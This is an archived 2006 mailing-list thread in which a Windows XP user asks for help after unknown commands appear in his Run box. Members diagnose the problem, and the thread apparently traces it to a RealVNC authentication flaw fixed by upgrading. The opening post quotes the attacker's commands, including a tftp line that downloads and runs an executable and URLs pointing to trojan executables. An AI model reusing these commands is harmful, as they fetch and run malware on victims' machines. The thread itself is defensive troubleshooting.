Post by thread:[EE]: WINXP Malware Attacks? CAUTION

Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: http://homepage.my-place.us/system.exe Well, I immediately disabled the network connection and I don't think this program was executed. Then I scrolled through the Run window and found the following 3 lines: cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit http://kruma.us/vn.exe %SYSTEMROOT%\SYSTEM32\CMD.EXE This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)? Thanks, Carey

On 10/5/06, Carey Fisher - NCS <spam_OUTcareyfisherTakeThisOuTncsradio.com> wrote: > Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: > > http://homepage.my-place.us/system.exe > > Well, I immediately disabled the network connection and I don't think this program was executed. > > Then I scrolled through the Run window and found the following 3 lines: > > cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit > http://kruma.us/vn.exe > %SYSTEMROOT%\SYSTEM32\CMD.EXE > > This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). > > Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)? Some variant of: http://www.sophos.com/security/analyses/trojtofgerb.html ? Try a free trial of PCdefense... http://www.laplink.com/pcdefense/ Run all the scans as you appear to be infected with something. Orin.

Sounds like: http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html BTW, tried the IRC server, it's down. Sounds like an old botnet. I've also stumbled across (and misplaced) a website that claimed it could come from using a web browser that supports VBS. Regards & good luck, Peter On 05/10/06, Carey Fisher - NCS <.....careyfisherKILLspam@spam@ncsradio.com> wrote: {Quote hidden}> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: > > http://homepage.my-place.us/system.exe > > Well, I immediately disabled the network connection and I don't think this program was executed. > > Then I scrolled through the Run window and found the following 3 lines: > > cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit > http://kruma.us/vn.exe > %SYSTEMROOT%\SYSTEM32\CMD.EXE > > This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). > > Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)? > > Thanks, > Carey > -

Check your "autoruns" using autoruns from sysinternals. http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in case you don't know, that windows activates when it starts, and is an easy way for malware to get itself started again when you reboot. Since this means the malware does not need to modify an existing .exe to get started, it will NOT appear on most anti-virus scans. Adaware does a better job of catching these automatically, but I find that getting to know the autoruns is a better way of combating the problem. This has more info on your bad .exe fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.h tml "WFUDPGEMR.EXE may use 5 or more path and file names, these are the most common: 1 :%TEMP%\DHAYZLAUKX.EXE 2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE" Each of those may be listed in your autoruns. Please DO keep us posted? I'm very interested to know what you find. --- James. > {Original Message removed}

Carey Fisher - NCS wrote: > Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: > > h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ] ClamAV says: philpem@wolf:~/MALWARE$ clamscan system_exe system_exe: Trojan.Mybot-1445 FOUND ----------- SCAN SUMMARY ----------- Known viruses: 71517 Engine version: 0.88.2 Scanned directories: 0 Scanned files: 1 Infected files: 1 Data scanned: 0.32 MB Time: 46.696 sec (0 m 46 s) Virusdata from Sophos is here: http://www.sophos.com/security/analyses/w32rbotadh.html If you don't have an antivirus installed, go find a clean machine, grab AVG (from free.grisoft.com), burn it to CD, then install it. If AVG won't install, get the firewall enabled and block *everything*. Go to http://housecall.trendmicro.com/ and scan your system. Let it remove any viruses it finds. Then install AVG. Looks like pretty much your standard password stealing IRC botnet building trojan/worm. If I get sufficiently bored, I'll throw it into a VMware sandbox and pull it to bits with the old IDA freeware release and OllyDebug. > This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). I notice you're using Outlook Express (the X-Mailer header told me <grin>). FWIW, there are tons of exploits that allow remote code execution in OE. The old double-extension bug, buffer overflows, the list goes on. I'd switch to Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all of your mail and settings from OE). What antivirus are you using? I guess you've got a perimeter firewall on the router. Any firewall software on the machine itself (e.g. ZoneAlarm)? > Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)? I wonder if someone exploited VNC... What's your VNC password like - all lowercase and less than 8 characters maybe? And no numbers or symbols? :) I have my network set up so that you have to SSH in (and use a public key to authenticate yourself with the server), then you have to tunnel from the server to the machines inside the network. There are only a few ports open on the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN from the Internet, I don't add a port-forward, I use an SSH tunnel. -- Phil. | (\_/) This is Bunny. Copy and paste Bunny piclistKILLspamphilpem.me.uk | (='.'=) into your signature to help him gain http://www.philpem.me.uk/ | (")_(") world domination.

Thanks for the replies everyone... comments below... Philip Pemberton wrote: > Carey Fisher - NCS wrote: > >> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: >> >> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ] >> > > ClamAV says: > philpem@wolf:~/MALWARE$ clamscan system_exe > system_exe: Trojan.Mybot-1445 FOUND > ... > .... > If you don't have an antivirus installed, go find a clean machine, grab AVG > (from free.grisoft.com), burn it to CD, then install it. If AVG won't install, > get the firewall enabled and block *everything*. Go to > http://housecall.trendmicro.com/ and scan your system. Let it remove any > viruses it finds. Then install AVG. > Yeah, I use AVG and keep it up to date. I also used McAfee Virus Scan and nothing can find a virus on that machine. > I notice you're using Outlook Express (the X-Mailer header told me <grin>). > FWIW, there are tons of exploits that allow remote code execution in OE. The > old double-extension bug, buffer overflows, the list goes on. I'd switch to > Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all > of your mail and settings from OE). > I have Thunderbird on all but that one machine - in fact I'm using Thunderbird now. Maybe I should switch that last machine:) > What antivirus are you using? > I guess you've got a perimeter firewall on the router. Any firewall software > on the machine itself (e.g. ZoneAlarm)? > Just using the router for a firewall. I've scanned it from outside and no ports are open except VNC & SKYPE. Also, I've set the DHCP on the DSL Modem to reset every hour. > >> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)? >> > > I wonder if someone exploited VNC... What's your VNC password like - all > lowercase and less than 8 characters maybe? And no numbers or symbols? :) > That's what I'm wondering too... my pw is >8 char and numbers and letters. > I have my network set up so that you have to SSH in (and use a public key to > authenticate yourself with the server), then you have to tunnel from the > server to the machines inside the network. There are only a few ports open on > the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN > from the Internet, I don't add a port-forward, I use an SSH tunnel. > I also run StartUpMonitor so any new programs can't get stuck in as autoruns. I'll run Ethereal a while and see what I catch. Maybe set up a different machine as a "honeypot". Carey

Gerhard Fiedler wrote: > Carey Fisher wrote: > >> Just using the router for a firewall. >> > > One reason for using a local firewall is to have better control over the > outgoing connections from your machine. > > I do have the XP firewall turned on but no third party ones. And Wallwatcher has never reported a blocked outbound connection... hmmmm...blocked.... what about the ones that are not blocked... {Quote hidden}>> I've scanned it from outside and no ports are open except VNC & SKYPE. >> > > What ports do you open for Skype? I use it, and never opened any ports for > it. > > >> Also, I've set the DHCP on the DSL Modem to reset every hour. >> > > Which doesn't help if you have a trojan on your machine... > > I'm not sure whether this is too obvious, but do you know all processes > that run on your machine? > I have looked at the process list and looked up ones I didn't recognize - nothing funny there. Oh - another clue - never happens when I'm logged out of XP and never happens when I disable the network connection on the machine. I also don't normally run with Admin privileges. > Gerhard > Carey

> Gerhard Fiedler wrote: > > Carey Fisher wrote: > > > >> Just using the router for a firewall. > >> > > > > One reason for using a local firewall is to have better control over the > > outgoing connections from your machine. > > > > > I do have the XP firewall turned on but no third party ones. And > Wallwatcher has never reported a blocked outbound connection... > hmmmm...blocked.... > what about the ones that are not blocked... The XP firewall does not block outgoing traffic. The new Vista and Windiws Server firewall will. /Ruben ============================== Ruben Jönsson AB Liros Electronic Box 9124, 200 39 Malmö, Sweden TEL INT +46 40142078 FAX INT +46 40947388 .....rubenKILLspam.....pp.sbbs.se ==============================

Carey Fisher wrote: > Oh - another clue - never happens when I'm logged out of XP [...] AFAIK it's not possible to insert into the keyboard buffer (which seems to be what is happening) when you're not logged in or while the session is locked. Which is good (in this case) and can be a pain (when trying to automate a GUI application with something like AutoIt3 and wanting it to work while the session is locked). > [...] and never happens when I disable the network connection on the > machine. Seems you do have an infection. Strange though that no virus scanner catches it. Maybe you try to make a boot CD (look for BartPE for example) with a few scanners and run them from the boot CD. Gerhard

On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote: > Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following: > > http://homepage.my-place.us/system.exe > > Well, I immediately disabled the network connection and I don't think this program was executed. > > Then I scrolled through the Run window and found the following 3 lines: > > cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit > http://kruma.us/vn.exe > %SYSTEMROOT%\SYSTEM32\CMD.EXE > > This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). I'm no expert, but a google search on wfudpgemr.exe resulted in the following hit: http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc > Anybody know anything about any of these apparent attacks. Not really, haven't been paying much attention. > Any suggestions to prevent this particular exploit (START/Run)? Perhaps a little extreme for most, but: run a different OS. MacOS isn't bad, I run Linux. TTYL

On 10/6/06, Gerhard Fiedler <EraseMElistsspam_OUTTakeThisOuTconnectionbrazil.com> wrote: > Carey Fisher wrote: > > > Oh - another clue - never happens when I'm logged out of XP [...] > > AFAIK it's not possible to insert into the keyboard buffer (which seems to > be what is happening) when you're not logged in or while the session is > locked. Which is good (in this case) and can be a pain (when trying to > automate a GUI application with something like AutoIt3 and wanting it to > work while the session is locked). It is possible. Quite easy by inserting an upper filter driver abover the keyoard driver. It's done by the remote control applications. It does need admin rights to install and a reboot. The really bad thing is if you remove the driver but don't fix the registry, you lose your keyboard! Orin.

> Oh - another clue - never happens when I'm logged out of XP > and never happens when I disable the network connection on > the machine. I also don't normally run with Admin privileges. The malware may be starting in your logon script. http://www.windowsnetworking.com/articles_tutorials/wxpplogs.html Again, autorun from sysinternals (a free utility) will list all possible sources for the startup of any program. Finding and removing the entry for the malware will stop it from gaining control of the system. http://www.sysinternals.com/Utilities/Autoruns.html Note that there are many strange looking things that DO need to start, and you must be careful. Autoruns allows you to filter OUT Microsoft signed programs, and it has a nice feature to google for the program name which will generally allow you to see what it does and why. Be sure to run it after booting in safemode so that they program will not be able to re-install its self in the run list after you remove it. --- James.

> > The last time I tried to find out which port(s) Skype uses, I was > unable to (they said something like "anything over 1024", which > isn't very good for > filtering!). Which ones do you use/allow through for Skype? i don't use skype because i disaprove of their policies of raping other users bandwidth to provide service to those on firewalled networks. if you must use it i strongly advise against forwarding any ports for it (even if you find out what listen port it uses) as this may allow your copy of skype to become a supernode and suck up insane bandwidth (saturating a 100megabit connection is NOT unheared of).

peter green wrote: > Howard Winter wrote: >> The last time I tried to find out which port(s) Skype uses, I was unable >> to (they said something like "anything over 1024", which isn't very >> good for filtering!). Which ones do you use/allow through for Skype? FWIW, I'm behind an SMC firewall and I don't forward anything for Skype. It seems to work with outbound connections only. > i don't use skype because i disaprove of their policies of raping other > users bandwidth to provide service to those on firewalled networks. How's that? Do you have more detailed information? Gerhard

How is this matter going? Actually I encountered exact the same virus/worm and don't know how to get rid of it. Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty sure it has something to do with VNC: This issue occurs with my 3 machines with VNC server installed every a few minutes intermittently. After I closed VNC server, seems it won't occur for now. Any final solution for this? -- View this message in context: www.nabble.com/-EE-%3A-WINXP-Malware-Attacks--CAUTION---POSSIBLE-BAD-LINKS-LISTED-tf2391073.html#a6701146 Sent from the MicroControllers - PIC mailing list archive at Nabble.com.

Frank Niu wrote: > How is this matter going? Actually I encountered exact the same virus/worm > and don't know how to get rid of it. > > I've scanned with multiple virus scanners including AVG and Norton. I've run Adaware and Spybot and I've found nothing at all. Also, still no intrusions with any one or more of the following true: VNC stopped network disconnected logged out > Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty > sure it has something to do with VNC: This issue occurs with my 3 machines > with VNC server installed every a few minutes intermittently. After I closed > VNC server, seems it won't occur for now. > > Any final solution for this? > pe a > I'm convinced there is no virus in the machine and it seems someone is trying to (manually?) type a command in the Start/Run box as if they are sitting in front of the computer. So, that sorta leaves VNC except I have it running as a Service which means if someone was using VNC they could still use it when all users are logged out except they can't login cause I have a strong password. I have 3 machines with VNC but only one is forwarded to from the router. That's the one that's being compromised. Now I'm investigating my Wi-Fi nodes. Carey

On 10/9/06, Carey Fisher <@spam@careyfisherKILLspamncsradio.com> wrote: {Quote hidden}> > Frank Niu wrote: > > How is this matter going? Actually I encountered exact the same virus/worm > > and don't know how to get rid of it. > > > > > I've scanned with multiple virus scanners including AVG and Norton. > I've run Adaware and Spybot and I've > found nothing at all. > > Also, still no intrusions with any one or more of the following true: > VNC stopped > network disconnected > logged out > > > Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty > > sure it has something to do with VNC: This issue occurs with my 3 machines > > with VNC server installed every a few minutes intermittently. After I closed > > VNC server, seems it won't occur for now. > > > > Any final solution for this? > > pe a > > > I'm convinced there is no virus in the machine and it seems someone is > trying to (manually?) type a command in the Start/Run box as if they are > sitting in front of the computer. > > So, that sorta leaves VNC except I have it running as a Service which > means if someone was using VNC they could still use it when all users > are logged out except they can't login cause I have a strong password. > I have 3 machines with VNC but only one is forwarded to from the > router. That's the one that's being compromised. > > Now I'm investigating my Wi-Fi nodes. VNC's password encryption _wasn't_ last time I looked. If you can sniff the network, it doesn't matter how strong the password is. As for WiFi, what encryption are you using? WEP isn't secure. I've deliberately sniffed my own network with kismet and run aircrack. It took a couple of GB of data, but it found the key. Orin.

> I'm convinced there is no virus in the machine and it seems > someone is trying to (manually?) type a command in the > Start/Run box as if they are sitting in front of the computer. > > So, that sorta leaves VNC except I have it running as a > Service which means if someone was using VNC they could still > use it when all users are logged out except they can't login > cause I have a strong password. > I have 3 machines with VNC but only one is forwarded to from > the router. That's the one that's being compromised. > > Now I'm investigating my Wi-Fi nodes. > > Carey Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing the glue that holds the internet together) fired up and set to look for that string and log any packets containing it. If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start looking for a VPN solution and VNC was on my list to check. --- James.

> > If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to > start > looking for a VPN solution and VNC was on my list to check. Hi James, VNC is not VPN - but if you are using it on the internet, you should use it inside a VPN or SSH. Another remote client/server you might look at is NX (No Machine). It uses less bandwidth but is much more processor intensive than VNC. And is not open source(although there are free beer versions). It uses SSH by default, I believe. (I only use these things locally behind a firewall, so I don't pay much attention to that part of it). Cheerful regards, Bob

James Newtons Massmind wrote: {Quote hidden}>> I'm convinced there is no virus in the machine and it seems >> someone is trying to (manually?) type a command in the >> Start/Run box as if they are sitting in front of the computer. >> >> So, that sorta leaves VNC except I have it running as a >> Service which means if someone was using VNC they could still >> use it when all users are logged out except they can't login >> cause I have a strong password. >> I have 3 machines with VNC but only one is forwarded to from >> the router. That's the one that's being compromised. >> >> Now I'm investigating my Wi-Fi nodes. >> >> Carey >> > > > Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing > the glue that holds the internet together) fired up and set to look for that > string and log any packets containing it. > > If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start > looking for a VPN solution and VNC was on my list to check. > > > One thing to be aware of is that "VNC" is really just a reference to a protocol, and not a particular application. There are literally dozens of different implementations of VNC - some commercial, some open source, etc. Some have holes big enough to drive a truck through, while others are reasonably secure. That being said, there's no way in heck I'd ever use any VNC application that wasn't being tunneled over a VPN or SSH. - Rich

On 10/9/06, Rich Mulvey <KILLspamrichKILLspammulveyfamily.com> wrote: > One thing to be aware of is that "VNC" is really just a reference to > a protocol, and not a particular application. There are literally > dozens of different implementations of VNC - some commercial, some open > source, etc. Some have holes big enough to drive a truck through, while > others are reasonably secure. > > That being said, there's no way in heck I'd ever use any VNC > application that wasn't being tunneled over a VPN or SSH. That's safest... If you want a (rather old now) SSL enabled VNC, it's available from: http://www.laplink.com/products/vnc/overview.asp Orin.

Orin Eman wrote: {Quote hidden}> On 10/9/06, Rich Mulvey <RemoveMErichTakeThisOuTmulveyfamily.com> wrote: > >> One thing to be aware of is that "VNC" is really just a reference to >> a protocol, and not a particular application. There are literally >> dozens of different implementations of VNC - some commercial, some open >> source, etc. Some have holes big enough to drive a truck through, while >> others are reasonably secure. >> >> That being said, there's no way in heck I'd ever use any VNC >> application that wasn't being tunneled over a VPN or SSH. >> > > That's safest... > > If you want a (rather old now) SSL enabled VNC, it's available from: > > http://www.laplink.com/products/vnc/overview.asp > > Orin. > I understand what you guys are saying and I do have a VPN equipped router at this location. But I need (want?) to access the machine in question from nearly anywhere and any machine so I can't count on being able to setup a tunnel from just anywhere. Maybe I should just run VNC over a VPN connection between here and the one other place I spend a lot of time. I can install a VPN router there. BTW, I'm running RealVNC and my password is ............ at IP address 192.168.99.257 ;) Carey

Carey Fisher wrote: {Quote hidden}> Orin Eman wrote: > >> On 10/9/06, Rich Mulvey <spamBeGonerichspamBeGonemulveyfamily.com> wrote: >> >> >>> One thing to be aware of is that "VNC" is really just a reference to >>> a protocol, and not a particular application. There are literally >>> dozens of different implementations of VNC - some commercial, some open >>> source, etc. Some have holes big enough to drive a truck through, while >>> others are reasonably secure. >>> >>> That being said, there's no way in heck I'd ever use any VNC >>> application that wasn't being tunneled over a VPN or SSH. >>> >>> >> That's safest... >> >> If you want a (rather old now) SSL enabled VNC, it's available from: >> >> www.laplink.com/products/vnc/overview.asp >> >> Orin. >> >> > > I understand what you guys are saying and I do have a VPN equipped > router at this location. > But I need (want?) to access the machine in question from nearly > anywhere and any machine > so I can't count on being able to setup a tunnel from just anywhere. > Maybe I should just run VNC over a VPN connection between here and the > one other place > I spend a lot of time. I can install a VPN router there. > BTW, I'm running RealVNC and my password is ............ at IP address > 192.168.99.257 > ;) > Carey > > perhaps enable web managment of your router (as in from outside) with a good password. then allow port forwards from the machine your on when you want to use it? rather than from the whole net the whole time. Otherwise get a "real" firewall (linux style) and put a port knock thing on (doorman) that will allow you in.

On 10/10/06, Carey Fisher <TakeThisOuTcareyfisherEraseMEspam_OUTncsradio.com> wrote: {Quote hidden}> Orin Eman wrote: > > On 10/9/06, Rich Mulvey <RemoveMErichTakeThisOuTmulveyfamily.com> wrote: > > > >> One thing to be aware of is that "VNC" is really just a reference to > >> a protocol, and not a particular application. There are literally > >> dozens of different implementations of VNC - some commercial, some open > >> source, etc. Some have holes big enough to drive a truck through, while > >> others are reasonably secure. > >> > >> That being said, there's no way in heck I'd ever use any VNC > >> application that wasn't being tunneled over a VPN or SSH. > >> > > > > That's safest... > > > > If you want a (rather old now) SSL enabled VNC, it's available from: > > > > www.laplink.com/products/vnc/overview.asp > > > > Orin. > > > > I understand what you guys are saying and I do have a VPN equipped > router at this location. > But I need (want?) to access the machine in question from nearly > anywhere and any machine That's what Laplink Everywhere does... it's not free though. It uses a Java VNC viewer to try to cover as many client operating systems as possible - if you have access to a Java enabled browser, you can access your VNC server. I don't recall if the open source Java VNC viewer that's available from the above link will make a direct connection to a VNC server or not (if not, the change would be trivial), but it will do SSL as will the server I originally mentioned. Orin.

Carey Fisher wrote: > I understand what you guys are saying and I do have a VPN equipped router > at this location. But I need (want?) to access the machine in question > from nearly anywhere and any machine so I can't count on being able to > setup a tunnel from just anywhere. Maybe I should just run VNC over a > VPN connection between here and the one other place I spend a lot of > time. I can install a VPN router there. A PPTP connection is set up pretty quickly on any recent Windows PC, and doesn't need a special router. (Most let it pass, for one connection at least.) Gerhard

On 10/10/06, Gerhard Fiedler <listsEraseME.....connectionbrazil.com> wrote: > Carey Fisher wrote: > > > I understand what you guys are saying and I do have a VPN equipped router > > at this location. But I need (want?) to access the machine in question > > from nearly anywhere and any machine so I can't count on being able to > > setup a tunnel from just anywhere. Maybe I should just run VNC over a > > VPN connection between here and the one other place I spend a lot of > > time. I can install a VPN router there. > > A PPTP connection is set up pretty quickly on any recent Windows PC, and > doesn't need a special router. (Most let it pass, for one connection at > least.) Whether it works or not is a different matter... Sorry for the rant, but my copy of XP at home can't handle a bad packet during the PPTP startup and just sits and sulks. A Win2k virtual machine under Vmware on Gentoo Linux however works fine... Orin.

I got a announcement about this issue. It is indeed a VNC-related security problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2) ********************************** There is a known exposure in some versions of the popular program VNC by which an attacker can get past the password protection and compromise the system. It was found in the "RealVNC" version and an upgrade which fixes this exposure is available. Other versions of VNC may or may not be affected. Recently, a program which exploits this vulnerability has been spotted in the wild. The corporate threat team is aware of this and has set the corporate IPS systems to block this worm when spotted and to issue service desk tickets against the source address (if internal). At this time, there is no indication that a "CIO Patch Override" will be needed. If you currently use RealVNC to remotely access your systems please check that you have the latest build of your version of RealVNC. During the recent Digital Threat and Risk Assessment it was discovered that older builds of RealVNC has vulnerabilities that can be (and were) exploited to gain unauthorized access to systems. You will need to upgrade your version of RealVNC if you have a build date earlier then MAY 2006. RealVNC upgrades are available at http://www.realvnc.com/upgrade.html ********************************* Carey Fisher - NCS wrote: {Quote hidden}> > > Frank Niu wrote: >> How is this matter going? Actually I encountered exact the same >> virus/worm >> and don't know how to get rid of it. >> >> > I've scanned with multiple virus scanners including AVG and Norton. > I've run Adaware and Spybot and I've > found nothing at all. > > Also, still no intrusions with any one or more of the following true: > VNC stopped > network disconnected > logged out > >> Checked with sysinternal autorun.exe, found nothing suspicious. I'm >> pretty >> sure it has something to do with VNC: This issue occurs with my 3 >> machines >> with VNC server installed every a few minutes intermittently. After I >> closed >> VNC server, seems it won't occur for now. >> >> Any final solution for this? >> pe a >> > I'm convinced there is no virus in the machine and it seems someone is > trying to (manually?) type a command in the Start/Run box as if they are > sitting in front of the computer. > > So, that sorta leaves VNC except I have it running as a Service which > means if someone was using VNC they could still use it when all users > are logged out except they can't login cause I have a strong password. > I have 3 machines with VNC but only one is forwarded to from the > router. That's the one that's being compromised. > > Now I'm investigating my Wi-Fi nodes. > > Carey > --

Frank Niu wrote: > I got a announcement about this issue. It is indeed a VNC-related security > problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2) > > ********************************** > There is a known exposure in some versions of the popular program VNC by > which an attacker can get past the password protection and compromise the > system. It was found in the "RealVNC" version and an upgrade which fixes > this exposure is available. Other versions of VNC may or may not be > affected. > That's a very important catch, Frank. Thanks! --Bob {Quote hidden}> Recently, a program which exploits this vulnerability has been spotted in > the wild. The corporate threat team is aware of this and has set the > corporate IPS systems to block this worm when spotted and to issue service > desk tickets against the source address (if internal). At this time, > there is no indication that a "CIO Patch Override" will be needed. > > > If you currently use RealVNC to remotely access your systems please check > that you have the latest build of your version of RealVNC. During the > recent Digital Threat and Risk Assessment it was discovered that older > builds of RealVNC has vulnerabilities that can be (and were) exploited to > gain unauthorized access to systems. > > You will need to upgrade your version of RealVNC if you have a build date > earlier then MAY 2006. RealVNC upgrades are available at > http://www.realvnc.com/upgrade.html > > ********************************* > > > Carey Fisher - NCS wrote: > >> Frank Niu wrote: >> >>> How is this matter going? Actually I encountered exact the same >>> virus/worm >>> and don't know how to get rid of it. >>> >>> >>> >> I've scanned with multiple virus scanners including AVG and Norton. >> I've run Adaware and Spybot and I've >> found nothing at all. >> >> Also, still no intrusions with any one or more of the following true: >> VNC stopped >> network disconnected >> logged out >> >> >>> Checked with sysinternal autorun.exe, found nothing suspicious. I'm >>> pretty >>> sure it has something to do with VNC: This issue occurs with my 3 >>> machines >>> with VNC server installed every a few minutes intermittently. After I >>> closed >>> VNC server, seems it won't occur for now. >>> >>> Any final solution for this? >>> pe a >>> >>> >> I'm convinced there is no virus in the machine and it seems someone is >> trying to (manually?) type a command in the Start/Run box as if they are >> sitting in front of the computer. >> >> So, that sorta leaves VNC except I have it running as a Service which >> means if someone was using VNC they could still use it when all users >> are logged out except they can't login cause I have a strong password. >> I have 3 machines with VNC but only one is forwarded to from the >> router. That's the one that's being compromised. >> >> Now I'm investigating my Wi-Fi nodes. >> >> Carey >> --

Orin Eman wrote: >> A PPTP connection is set up pretty quickly on any recent Windows PC, and >> doesn't need a special router. (Most let it pass, for one connection at >> least.) > > Whether it works or not is a different matter... > > Sorry for the rant, but my copy of XP at home can't handle a bad > packet during the PPTP startup and just sits and sulks. A Win2k > virtual machine under Vmware on Gentoo Linux however works fine... Well, yes, YMMV :) FWIW, I use PPTP regularly to connect to my home LAN (SMC router with built-in VPN server) from my WinXP Pro notebook, and I never had a problem. Gerhard

As does UltraVNC. RP On 11/10/06, Philip Pemberton <RemoveMEpiclistEraseMEEraseMEphilpem.me.uk> wrote: {Quote hidden}> Orin Eman wrote: > > That's what Laplink Everywhere does... it's not free though. It uses > > a Java VNC viewer to try to cover as many client operating systems as > > possible - if you have access to a Java enabled browser, you can > > access your VNC server. > > TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port > 5800. > > -- > Phil. | (\_/) This is Bunny. Copy and paste Bunny > RemoveMEpiclistspam_OUTKILLspamphilpem.me.uk | (='.'=) into your signature to help him gain > http://www.philpem.me.uk/ | (")_(") world domination. > -

Bob Axtell wrote: > Frank Niu wrote: > >> I got a announcement about this issue. It is indeed a VNC-related security >> problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2) >> >> ********************************** >> There is a known exposure in some versions of the popular program VNC by >> which an attacker can get past the password protection and compromise the >> system. It was found in the "RealVNC" version and an upgrade which fixes >> this exposure is available. Other versions of VNC may or may not be >> affected. >> >> > That's a very important catch, Frank. Thanks! > > --Bob > > Yes, thanks Frank! Carey

Gerhard Fiedler wrote: {Quote hidden}> Orin Eman wrote: > > >>> A PPTP connection is set up pretty quickly on any recent Windows PC, and >>> doesn't need a special router. (Most let it pass, for one connection at >>> least.) >>> >> Whether it works or not is a different matter... >> >> Sorry for the rant, but my copy of XP at home can't handle a bad >> packet during the PPTP startup and just sits and sulks. A Win2k >> virtual machine under Vmware on Gentoo Linux however works fine... >> > > Well, yes, YMMV :) > > FWIW, I use PPTP regularly to connect to my home LAN (SMC router with > built-in VPN server) from my WinXP Pro notebook, and I never had a problem. > > Gerhard > Gerhard, I like your approach and am going to try it - VPN server-in-router at main location, setup PPTP at the other end. Thanks, Carey